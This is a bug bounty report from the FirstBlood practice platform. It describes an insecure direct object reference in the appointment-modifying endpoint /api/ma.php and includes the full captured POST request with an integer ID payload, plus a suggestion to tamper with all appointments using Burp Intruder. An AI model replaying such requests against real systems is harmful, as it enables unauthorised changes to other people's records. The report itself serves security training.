FirstBlood-#127 — IDOR on ma.php
This issue was discovered on FirstBlood v1
On 2021-05-10, jpdev Level 3 reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
BugBountyHunter Membership
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
Summary
The manage appointments API allows for the use of interger values by capturing the request within burp and amending the guid to its interger id. This ID can be found on the index page of the drpanel within the source of the page within the getinfo function call.
Request
POST /api/ma.php HTTP/1.1
Host: firstbloodhackers.com:49335
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-SITE-REQ: permitted
csrf: 99215d4e-0ff3-4275
Content-Length: 24
Origin: http://firstbloodhackers.com:49335
DNT: 1
Connection: close
Referer: http://firstbloodhackers.com:49335/manageappointment.php?success&aptid=81435813-e40a-411d-af19-6e2d89963493
Cookie: drps=62f02a3467fff377e02116e10
message=test&id=56911904
iMPACT
A melicious user can now use BURP intruder to amend all appointments removing potentially key notes.
P2 High
Endpoint: /api/ma.php
Parameter: id=
Payload: 56911904
FirstBlood ID: 6
Vulnerability Type: Insecure direct object reference
The endpoint MA.php (to modify an appointment) will allow for integer values to be used when modifying appointments. A bad cause of security through obscurity was attempted.